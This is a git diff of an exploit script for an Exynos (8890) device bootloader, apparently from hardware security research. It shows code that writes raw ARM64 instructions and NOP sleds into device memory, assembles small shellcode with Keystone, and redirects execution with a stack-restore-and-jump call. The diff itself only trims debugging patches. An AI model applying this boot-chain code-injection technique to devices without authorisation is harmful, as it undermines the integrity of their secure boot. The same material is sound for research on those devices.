diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py index c10a02f..cd0f749 100644 --- a/source/exploit/exploit.py +++ b/source/exploit/exploit.py @@ -806,61 +806,21 @@ class ExynosDevice(): print(self.cd.memdump_region(0x8f063710, 0x8)) # Modify USB Recovyer mode string to: NFI Patched BL33 - self.cd.memwrite_region(0x8f06ab10, b'\x4e\x46\x49\x20\x50\x61\x74\x63\x68\x69\x6e\x67\x20\x42\x4c\x33\x33') + patch_string = b'\x4e\x46\x49\x20\x50\x61\x74\x63\x68\x69\x6e\x67\x20\x42\x4c\x33\x33' + # self.cd.memwrite_region(0x8f06ab10, b'\x4e\x46\x49\x20\x50\x61\x74\x63\x68\x69\x6e\x67\x20\x42\x4c\x33\x33') # Print state of x30/LR on screen # self.cd.memwrite_region(0x8f01dc08, struct.pack('>I', 0xa40000f9)) - # # Nop-able, but executed space - self.cd.memwrite_region(0x8f01dca8, struct.pack('>I', 0x804682d2)) - # self.cd.memwrite_region(0x8f01dca8, struct.pack('>I', 0x1f2003d5)) + # Write NOP from 0x8f008cb8 to 0x8f008d14 + self.cd.memwrite_region(0x8f008cb8, b'\x1f\x20\x03\xd5' * 10) - self.cd.memwrite_region(0x8f01dcb0, struct.pack('>I', 0xe4ff9fd2)) - # self.cd.memwrite_region(0x8f01dcb0, struct.pack('>I', 0x1f2003d5)) - - self.cd.memwrite_region(0x8f01dcb4, struct.pack('>I', 0xe5030091)) - # self.cd.memwrite_region(0x8f01dcb4, struct.pack('>I', 0x1f2003d5)) - - self.cd.memwrite_region(0x8f008cb8, struct.pack('>I', 0xaaaaaaaa)) #0x24660094 - # self.cd.memwrite_region(0x8f008cb8, struct.pack('>I', 0x1f2003d5)) - - # self.cd.memwrite_region(0x8f008cb8, struct.pack('>I', 0x03028052)) # Set W3 - self.cd.memwrite_region(0x8f008cb8, struct.pack('>I', 0x1f2003d5)) - - # self.cd.memwrite_region(0x8f008ccc, struct.pack('>I', 0xe3ff9fd2)) # Set x3 - self.cd.memwrite_region(0x8f008ccc, struct.pack('>I', 0x1f2003d5)) # Set x3 - - # self.cd.memwrite_region(0x8f008cc0, struct.pack('>I', 0xe2ff9fd2)) # Set x2 - self.cd.memwrite_region(0x8f008cc0, struct.pack('>I', 0x1f2003d5)) # Set x2 - - # # self.cd.memwrite_region(0x8f008cc4, struct.pack('>I', 0x804682d2)) # Set x0 to 0x0 - self.cd.memwrite_region(0x8f008cc4, struct.pack('>I', 0x1f2003d5)) # Set x0 to 0x0 - - # self.cd.memwrite_region(0x8f008cc8, struct.pack('>I', 0x410280d2)) # Set x1 - self.cd.memwrite_region(0x8f008cc8, struct.pack('>I', 0x1f2003d5)) # Set x1 - - # self.cd.memwrite_region(0x8f008cdc, struct.pack('>I', 0xe4ff9fd2)) # Set x4 to 0xffff - self.cd.memwrite_region(0x8f008cdc, struct.pack('>I', 0x1f2003d5)) # Set x4 to 0xffff - - # self.cd.memwrite_region(0x8f008cd0, struct.pack('>I', 0xe5030091)) # Set x5 to SP - self.cd.memwrite_region(0x8f008cd0, struct.pack('>I', 0x1f2003d5)) # Set x5 to SP - - # self.cd.memwrite_region(0x8f008cd4, struct.pack('>I', 0x00013fd6)) # Jump to screen function - self.cd.memwrite_region(0x8f008cd4, struct.pack('>I', 0x1f2003d5)) # Jump to screen function - - # self.cd.memwrite_region(0x8f008cd8, struct.pack('>I', 0xc00800b0)) # Set x7 to 0x0 - self.cd.memwrite_region(0x8f008cd8, struct.pack('>I', 0x1f2003d5)) # Set x7 to 0x0 - - ### SCREEN PATCHES - # Nop initial l_display screen at 0x8f022654 - # self.cd.memwrite_region(0x8f022654, struct.pack('>I', 0x1f2003d5)) - # self.cd.memwrite_region(0x8f022658, struct.pack('>I', 0x1f2003d5)) - # self.cd.memwrite_region(0x8f022658, struct.pack('>I', 0xe40300b9)) #Modify offset at pinter that contains the to-be printed text - # # Modify jh_format_log to instead jump to l_display_screen - # self.cd.memwrite_region(0x8f02265c, struct.pack('>I', 0xbbffff97)) - - # For when it works. Write jump - # self.cd.memwrite_region(0x8f008cb4, struct.pack('>I', 0x25660094)) + # Write opcode that writes 'aaaaaaaa' at 0x8f06ab10 +0x8 + shellcode = f""" + mov x21, #0x1 + """ + shellcode = ks.asm(shellcode, as_bytes=True)[0] + self.cd.memwrite_region(0x8f008cb8, shellcode) self.cd.restore_stack_and_jump(0x02024e5c) diff --git a/source/ghidra-transfer/8890_bootrom_bl31_bl2_7Sep2024.bin.gzf b/source/ghidra-transfer/8890_bootrom_bl31_bl2_7Sep2024.bin.gzf index 916b745..220da93 100644 Binary files a/source/ghidra-transfer/8890_bootrom_bl31_bl2_7Sep2024.bin.gzf and b/source/ghidra-transfer/8890_bootrom_bl31_bl2_7Sep2024.bin.gzf differ